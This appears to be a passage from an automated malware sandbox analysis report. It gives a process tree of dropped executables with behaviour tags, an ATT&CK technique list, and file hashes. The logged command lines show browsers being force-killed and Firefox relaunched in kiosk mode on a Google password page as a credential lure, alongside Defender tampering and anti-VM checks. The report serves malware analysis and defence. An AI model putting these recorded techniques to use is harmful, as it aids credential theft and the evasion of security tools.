- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2160
-
-
C:\Users\Admin\AppData\Local\Temp\10104940101\b35c8a7182.exe"C:\Users\Admin\AppData\Local\Temp\10104940101\b35c8a7182.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1832 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:580
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:2108
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2272 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.0.1856920404\1737087836" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f60bff9b-f662-4f28-8912-f8a6b50b1f66} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 1280 11ef3858 gpu9⤵PID:2000
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.1.1718862442\10946841" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dacc99ea-eb32-4ab7-8238-097b573dd4a0} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 1496 d74e58 socket9⤵PID:1964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.2.1900318187\659413493" -childID 1 -isForBrowser -prefsHandle 1992 -prefMapHandle 2008 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d5168e08-10f1-4472-93c4-35f275364dc5} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 1720 11e5a558 tab9⤵PID:1312
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.3.1514708554\201293305" -childID 2 -isForBrowser -prefsHandle 2924 -prefMapHandle 2920 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {10215be6-6caa-4a1f-8fa3-cac15faa6e01} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 2936 d64b58 tab9⤵PID:2680
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.4.2016096161\601390929" -childID 3 -isForBrowser -prefsHandle 3784 -prefMapHandle 3644 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {18241ec4-4d26-4f3f-b9cd-13459d7c5eaa} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 3796 1a3cb158 tab9⤵PID:2828
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.5.817658092\24534104" -childID 4 -isForBrowser -prefsHandle 3908 -prefMapHandle 3912 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b6c2081-5398-41fd-8398-ccb654364e8c} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 3896 2227cf58 tab9⤵PID:2652
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2272.6.1847443226\1554145026" -childID 5 -isForBrowser -prefsHandle 4072 -prefMapHandle 4076 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {411443b8-fc2c-412c-86de-8c37498ff2fa} 2272 "\\.\pipe\gecko-crash-server-pipe.2272" 4060 222a0a58 tab9⤵PID:3020
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104950101\a08064d4d7.exe"C:\Users\Admin\AppData\Local\Temp\10104950101\a08064d4d7.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"6⤵
- Executes dropped EXE
PID:3384
-
-
C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"7⤵
- Executes dropped EXE
PID:3564
-
-
C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3572 -
C:\Users\Admin\AppData\Roaming\Sisa9ZqkDf.exe"C:\Users\Admin\AppData\Roaming\Sisa9ZqkDf.exe"8⤵
- Executes dropped EXE
PID:3704
-
-
C:\Users\Admin\AppData\Roaming\fHR07lEtsm.exe"C:\Users\Admin\AppData\Roaming\fHR07lEtsm.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3720 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3720 -s 5489⤵PID:3352
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3504 -s 5167⤵
- Loads dropped DLL
- Program crash
PID:3636
-
-
-
C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3432 -
C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10104980101\mAtJWNv.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3432 -s 5007⤵
- Program crash
PID:3108
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
5Credentials In Files
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD502d2c46697e3714e49f46b680b9a6b83
SHA184f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA51260348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KIYAG1MM\service[1].htm
Filesize1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MPUI9R2R\soft[1]
Filesize987KB
MD5f49d1aaae28b92052e997480c504aa3b
SHA1a422f6403847405cee6068f3394bb151d8591fb5
SHA25681e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA51241f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\o97f221x.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD5898ec47861d34658c1d5bea0d350fa59
SHA164a22f564511e046bd6079ca1fffe8f3dead69fd
SHA25609e7efe22b168a2d3dba864f6916ccf3dfbc187c0f7e83af0086c2c2a3c607c6
SHA512e9aa03ac39516148303466b48acf82532b9403971e02a37fe875bc9db62bec1cb6f91f4f04650175fd08e626ab1f745bfc5bbf562e8ea7e19d388128b7ef989a
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\o97f221x.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
938KB
MD5b94f9347051a717bd369cee684b7eb6f
SHA1a0dc3fecc0cb6d49ac3dfec4a7a906e98f74eb63
SHA256d0a694d2cff80fa6c782801d761f9d5ab6fb458b0b8e9b87eef548914f716177
SHA51243a46c6747d5db0573bd8c2705ceb52bb7c4e9e6e49d85c3dada9864648be84cc4d7e2cf0908463a58dab6742ce2155eca7e7cdf1a070f04cca497adfda2206a
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
2.9MB
MD5f78cb447914b3fb54bd9ad30f6c9db9e
SHA1f18f46ff289782011e8a9c80b6f90e5d15aa3793
SHA2569d03e27cc59577a7d04ff7c95e7217089642d68914721a7c41b0bfc4195bb964
SHA5126ee772f1303030cfd7e7f582f72e16c7338bc3129d8c263d058c30c3ef30266514d2e5a0b4a2941af73bc2329def2b865c0e156976002d538acafeb69dfe457d
-
Filesize
712KB
MD5222ca959c06f62e99567723d7a0b82c2
SHA17bedfc54b4480250463716b19cc9842ad18adfc5
SHA256ceee1236c696b7bf0710c5a11021d3c99f11a47895ff29613baf2f3f4e6b933b
SHA5120b68f8e0781b1d0ca16e8800e7ba9eee4c35079734f11f91e37e457edad36185e84fbce4f1ca9d498d0d199d6f1e6ede28173882095de5f0378a4bb1f3d616e1
-
Filesize
3.7MB
MD54769a99eadbd516c17b7f4c541b87003
SHA1cfe5a9970182cf428919e9f110a63df37d0eee06
SHA256446ee955b11dbd350c8d44825c88d7846cf6c88c1604b1908739b2ec8b1cfc3e
SHA51236146efedbf0780bc6fe459f5c649549b79e79c3908593cc1471f6ed2bd79e1348353d2861a48364aaa86dd5c1a59f7d874811c4c5bcc843e459230c7afb0a91
-
Filesize
445KB
MD5c83ea72877981be2d651f27b0b56efec
SHA18d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA25613783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0
-
Filesize
4.5MB
MD596dd38daadfd80cf699a8c087b581ab9
SHA1ccea87fbad5d9fdea11ecedfd7f3d0b2d2ff3b2c
SHA256ad659d3cd67b4c566ada6bc6dfbeece67e5b1941585fbc480bdd80daf290a110
SHA5129862debc204be49700c1025ab9556a2b082890fae9e43ec9b7c7d41ed1db801601e48b51c755679b4035a4af7019b159451bc356769bd432b1173c15a10423ab
-
Filesize
1.8MB
MD5bde9a6abcb6323c95e4912af1dec9174
SHA1d732600d2bd0c05fbe4eb5e0f5320e1b45e7cc6a
SHA256c374a12d72f69efe4f1df4b8a40efdf0b3a3ff7c82d1e6f246ed32181701f699
SHA512dc4005df7bac77f96941b632a3cf18ace120b0b70a8d0749e5d657ac8f19fe4864bb9dc93e6c96dd06ce7036c7cf9fcb66cd56516a73d75992c2f17a53a2e2c3
-
Filesize
3.0MB
MD554b30d5072b09ae0b55ca89c3d6cea5f
SHA122459531f94d2c64f9adf316a4aa1e2c63ef8fe5
SHA2564b2bb17bfd3ec355a70605cb5a1971d098ccd1f92f0a47386e9166b223bb551f
SHA5125bdba7bc41d20c515bd58fcb7ceb67feadbd582c4ffeec426e1e370d105dde08c9d7f6ecf362066accc03bd80ebe94ccea7ad284d0e622e449dfe0d77272ff5c
-
Filesize
48KB
MD5d39df45e0030e02f7e5035386244a523
SHA19ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA51269866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64
-
Filesize
3.0MB
MD53d020a1f3a39cbf3cc5388fc44c98d0e
SHA1ca89df7cf0e6624d22885bd5caa4a952e9cf0c08
SHA256e5fec111044aa2eb782e39a5332e067cf911a6fa1fe55eaaa446df1a0d5655b7
SHA512b3a68853b082eeda17ef41b9c1763d487f778967d348a3de8c47a81d9550fcbbaffaec8e584d3b661d815abd653d5d5b27fdf7879dc061b7c22d164a2cfd7300
-
Filesize
1.7MB
MD578dd1277431fc66e855e72022c860e27
SHA10bba63575a0912d00e91963f2b77303f30861978
SHA256ab15b22d550865e2bf810c040cc4ec118c9c161cc7ab74d597fda7a31873f17c
SHA51237af33de6d0410d68aaffe17ee01c83793e6f6be0bb87b63af3be98951fca4bb518241244d0c6d6181ca5c9a024c97e8ad6076173150d3e968fea600a7bd29a1
-
Filesize
949KB
MD5593a33280543acef8878ad91a3cdcee2
SHA100cf7c13ae63fbe16847ebbad71f4baf0a266c5e
SHA2561a9ebb0cb706ac093e516c09b3bcce07ff9cc4f6291564788105e66b0561f563
SHA5125645dd4c6edbb759f9332fd60d20731b7faecc7e8dadaa7ef078f4dd0cc9dbd39a81b276a2b916bc9240b97fe224a6d0b77cf4674c3f2ac9f30d8e00d5912c56
-
Filesize
1.7MB
MD598ee4896338ef74dab5e7c33ddcc9351
SHA125d21fc6a6a559d3c669eae75cc4a5472ed7af77
SHA25696c7ccf3d949db0cc6d64ebaa6133a8dd21cd3931c4b72e2ba4e15584bdebfa1
SHA512f67f2fac33be4e9cae733131ab4d5c14c51bdc40f27ab2017ae66c3f7970bf81556e037ecdf73df0fe457f19dedfc87670839c25bb88ddeaadada1a22e13c48b
-
Filesize
30.4MB
MD5158f22bd8c5c1c37f7ecd4ea7ffed06d
SHA18f25c9a5e8204ad7bba72750cab8a896425ef01a
SHA256624c9457f49d82a1f167f00529665259cdcc30ac7995eb8dd36e23cf5cfd2510
SHA5122639510edb67caecb57f0cc6fadc72af7d409c84c4d8cc740dc0b8dfc5c682d6c4e8a79db2b279b69d436fee278262b97495588c3130b44362d8c425f4b13a9d
-
Filesize
350KB
MD5b60779fb424958088a559fdfd6f535c2
SHA1bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f
-
Filesize
717B
MD57ca4059c1bb111e0690924f53e8eaced
SHA10d7ba8a14ea745a035c11b3c1d1d3cfdeb9a17e6
SHA256376fca599d1b879cf4248c71ea01b111c8937ed44e7e7725c6c8473f2268c49c
SHA5120f7327892fc2312642a8012eda6f70085d6faee6b955e314d781ab14fa55c2b540d87cc270d1216b432d72051447aa88b051a585e811ff08d9b5af3e3749feb4
-
Filesize
717B
MD58521070bc51564057c612df38f7a8027
SHA179da383a7ae6b79a55e0a0a11341a04417cf6004
SHA256fdd320492b2768bd08a5b727caca4d0bf5bcb76ce460d7d90c1b7a58fb1de57f
SHA512e4737b9cbc44c9fdfb96305184372dfbb2a0eb0a5a896fef497e307ae578b8454355f1165f58e4da33e9fb5deb838f9fac15de59351041b06c901ebff1fc4ff1
-
Filesize
183KB
MD5109cab5505f5e065b63d01361467a83b
SHA14ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD56081584d2e25d790e32ab5027fe0e397
SHA1ce738d94c73f354624f82082267aba02ebb63070
SHA256733ebaa40d3cb9b40fcb6fbbf6841d6b00e1fd7d79e48dd58a3558c2477a3c93
SHA512c0340dfde136f940f106b414850b30af34e5d60fd8e03a36894ca6451c123fcff02a081161509f253be1700f8848f92da4c2d9a9940afe53f2b08c3c7a17c523
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD5169b4c4d2b557052e5e389ea72ef23fb
SHA193cd4af75d06b602149f55cf9a82c29d198181e4
SHA2561189e45709c449b21fd22773bb55452dcb6031e0b93db163dd17900694f51c8a
SHA51203fd4c9f25b381f618451d38d6dcac9be5502c59c1f9bccfb3efaeeb1f4ad588ff6e194161c434bba8d317421d78c6fd736a25cd1ce9bf7b799c26c817792a35
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\datareporting\glean\pending_pings\082ed31e-3645-4a51-8c8c-28cd00b48225
Filesize11KB
MD52a438faba5a3a3076879578a429e4eaf
SHA180d6fa50326202087f263b2a463d39d4bf6d2126
SHA256a7380cde4077a918eb0e0234f3a094cab3d0f123d3c177898ae10f8bf5f79547
SHA512153597cb7b7d1bb39fe46cccffedaa1d24138f8110802a4a0ff1f025fe14446c9ac42bea15fbb47799280d06de8e1ccefb53ce5a2340af9d104a1e09e6efa92a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\datareporting\glean\pending_pings\cccbac1f-393a-4148-be3f-a2429e24b9dc
Filesize745B
MD570b3caae7cd1874035fc7cc5221a5c8b
SHA1ee688d35b1cbf78cf683e69acf22133af24a9b6f
SHA256cb18517d3780bd0a09a60f3726dd15f6a913491b4bbf9633f7b22a0bb064c2e2
SHA5123c84ee390ef117dc09b7c71b9ee1c7c27fd258f8e59156b13bf9c2b224b1393b88149176b2966b46b07036b19cea3a4766dbc49bdd855cc279e37edfd997568e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\favicons.sqlite-wal
Filesize160KB
MD5ea0711e099d25e43a828529bbc40cd83
SHA1e577fb358e8396fef7dbcef5ce8f264e5e6fd348
SHA256838f0edd1157331038d3800b333859491a20601628bacf28bc89a6558fb9c82b
SHA51209881b1d6ffc585090f98b49df91b28a6b2403be5f6e5e26353a8c5b214c071aca564b060833ce73e6797aaa6988dec5df3d893fead7a5e19062574d4a2591db
-
Filesize
1.4MB
MD5795bee13366ad750823be4b75082ddc9
SHA12806ee99df52a93638075b2d9a37a50ca083b853
SHA256d5b95b6fea9315109fc81bb84b0e1b57d95523fd70f0e1db657b5e5a24a60105
SHA51239f8d99f02312be6a7ab2dc2ab6d36bd9122726008c982e49fbd886fa32ca1d3a079849037ed97c1ec903527d92a65c4f8a16373ac14170080cfb6dab8d49420
-
Filesize
6KB
MD56030cea4067b266811aa40971b5b0135
SHA1bbfbb6d8729edf1186ddc30527f9228d836e91cf
SHA2563cc2889ff8fb1fa91ae437893c8c062bbee0f63ddfdab9a443410743ac2fe862
SHA5125414bb4fad0ae63439a3c149c1162aba913e8c6e47ee374642a04504165103eae995682d66aabdf14e8b3b7b4b1a80c5c47d02a3fb93690fa8337ce3e82949cb
-
Filesize
6KB
MD5665d373de251c1c7aec1253903000345
SHA1eb88ff5d9a87ba84aded0bb48c164d239f5a862b
SHA25640635a285d190fd64885f9dc87456f5212c649b9edb589f42b49a24705cc0d97
SHA5124734fbe870229e481b6b5d95d9d5a42a7f256027788a54df9262dfc2bfd4db36e25f3e93029fcbc65fef30b489f24883b66a5f2bbe8ec1b89ccb4c190a8be27a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\o97f221x.default-release\sessionstore-backups\recovery.jsonlz4
Filesize4KB
MD51b6501f192c4c4e14543d7e7c83bd8cd
SHA18ead94d765018ec98677778c160c2afba48ec6b2
SHA25641e5fec2236ffc6e3fff0884116f80c266aa69a36512688ed2591768e41e01bf
SHA5128e18bd9d46494b058efc9eda24984554e0fb843cb88f6869cdba31bd8fafe26e5516022f9b9c707cf9cfd5686442cf03be5a98577bc35f13c1b0235ba01de51c
-
Filesize
18KB
MD5f3edff85de5fd002692d54a04bcb1c09
SHA14c844c5b0ee7cb230c9c28290d079143e00cb216
SHA256caf29650446db3842e1c1e8e5e1bafadaf90fc82c5c37b9e2c75a089b7476131
SHA512531d920e2567f58e8169afc786637c1a0f7b9b5c27b27b5f0eddbfc3e00cecd7bea597e34061d836647c5f8c7757f2fe02952a9793344e21b39ddd4bf7985f9d
-
Filesize
138KB
MD5137e3a65922a769e161f6241fc4800a5
SHA14260d6197fff6a2816363f66d4782a3e14c2c8f4
SHA2564a7e9eb31388ea24cf203e005dfaf80be2fb2c8160d5fb0c3038ad553d27756c
SHA5125d91fe6507e01cdbd0e5edf244c086cb9dee5e46296bf7128e63a1f8f0e6d87c9aa02d770cbe1e2d247078b44275d7f055c94f43d37a61a43d045efdaf4e6569
-
Filesize
1.8MB
MD523d6a88e50671a2d79a5fec5da38c672
SHA1d6ef750dab0728778055b3807473115b3c779862
SHA256aff49262b1924db1dc4c875a41f382c1a8266350ebb044d61692f9f73a558cdd
SHA5124d7e55454ff0915b829bdba9708a7c05c702fb6e2615a8e6a20b529be2aab5b2b9c6ee0f8ceed128a741717178b3c870e259054d877d382591ee3907aa69c560